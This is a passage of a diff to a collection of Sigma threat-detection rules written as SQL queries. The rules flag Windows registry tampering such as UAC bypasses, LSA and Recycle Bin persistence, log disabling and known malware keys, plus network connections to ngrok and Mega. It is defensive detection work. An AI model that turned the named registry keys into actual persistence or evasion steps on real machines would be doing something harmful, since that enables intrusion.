((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the modification of the registry to disable a system restore on the computer", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "status": "experimental", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.command_and_control", "attack.execution", - "attack.defense_evasion", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "test", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution", + "attack.persistence", + "attack.t1547.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "author": "frack113", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.010" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Software installers downloaded and used by users" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", - "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "test", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_event_apt_pandemic.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", - "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "author": "frack113", + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "status": "test", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1547.001" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.t1112" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_event_disable_wdigest_credential_guard.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects persistence registry keys for Recycle Bin", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "status": "test", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (NewProcessName = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_event_apt_oceanlotus_registry.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", "tags": [ "attack.persistence", - "attack.execution", - "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.com%' ESCAPE '\\' OR NewValue LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" - }, - { - "title": "Persistence Via Hhctrl.ocx", - "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", - "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" - ], - "filename": "registry_set_hhctrl_persistence.yml" + "filename": "registry_event_mal_flowcloud.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": 